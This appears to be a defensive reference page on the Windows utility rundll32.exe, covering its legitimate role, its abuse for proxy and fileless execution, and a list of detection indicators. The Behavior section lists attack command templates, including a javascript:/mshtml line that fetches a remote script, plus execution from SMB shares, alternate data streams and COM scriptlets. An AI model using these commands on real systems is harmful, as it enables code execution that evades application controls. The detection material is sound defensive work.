Process
rundll32.exe
rundll32.exe is a Windows utility that runs functions exported by DLL files. Because a DLL cannot execute on its own, Windows uses rundll32.exe to call a specific function inside one, which is how many built-in features such as Control Panel applets are launched. That same ability to run arbitrary DLL code makes it one of the most abused binaries on Windows.
File identity
Not observed.
Not observed.
Not observed.
Not observed.
Execution context
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Not observed.
Ancestry
Not observed.
Not observed.
Not observed.
Not observed.
Behavior
Not observed.
Not observed.
Not observed.
Not observed.
rundll32.exe {PATH},EntryPointExecute · Execute DLL filerundll32.exe {PATH_SMB:.dll},EntryPointExecute · Execute DLL from SMB share.rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}")Execute · Execute code from Internetrundll32 "{PATH}:ADSDLL.dll",DllMainADS · Execute code from alternate data streamrundll32.exe -sta {CLSID}Execute · Execute a DLL/EXE COM server payload or ScriptletURL code.
Indicators
Not observed.
Analysis
rundll32.exe loads a DLL and calls one of its exported functions. The command line names the DLL and the entry point, as in rundll32.exe shell32.dll,Control_RunDLL, optionally followed by arguments passed to that function. Windows leans on it constantly: Control Panel applets, printer and display dialogs, and many shell actions are really rundll32 calling an exported function. The genuine binary lives at C:\Windows\System32\rundll32.exe, with a 32-bit copy under SysWOW64.
The function it calls has to be exported by the DLL, and can be named or referenced by ordinal number. Beyond plain DLLs it can reach a few special handlers: it runs Control Panel (.cpl) files, and through the legacy mshtml.dll it can execute inline JavaScript straight from the command line. Its parent is whatever invoked the feature, most often explorer.exe, Control Panel, or another Windows component.
Several rundll32 instances at once are normal on a desktop, each tied to whatever Windows feature started it, short-lived for a dialog and longer-lived for anything that keeps a window open. What rundll32 is doing at any moment is defined entirely by the DLL and entry point on its command line.
rundll32.exe is a top proxy-execution tool (T1218.011). The signed binary will run code from any DLL it is pointed at, which lets an attacker execute a malicious DLL under a trusted, Microsoft-signed process and slip past application-control rules. Path and signature checks pass, so what to read instead is the DLL path, the entry point, and the parent. A DLL loaded from a user-writable directory, or called by a bare ordinal, deserves a close look.
An empty command line is its own tell. A rundll32.exe running with no DLL or entry point argument is a long-standing sign of process injection, a hollow host spawned only to receive injected code (T1055).
rundll32 is also a fileless execution path. Through the legacy mshtml.dll handler it can run inline JavaScript from the command line (T1059.007), fetching and executing a payload without writing a script to disk. A javascript: string or a reference to RunHTMLApplication in a rundll32 command line is almost never legitimate.
- Image path other than
C:\Windows\System32\rundll32.exeor itsSysWOW64copyhigh - Running with no command-line arguments (no DLL or entry point)high
- Loading a DLL from a user-writable path (
Temp,AppData,ProgramData,Downloads)high javascript:,mshtml, orRunHTMLApplicationon the command linehigh- Parent is an Office application,
wscript.exe,cscript.exe, ormshta.exehigh - Calling an exported function by ordinal from a non-system DLLmed
- Outbound network connections shortly after launchmed
Telemetry
Not observed.
Not observed.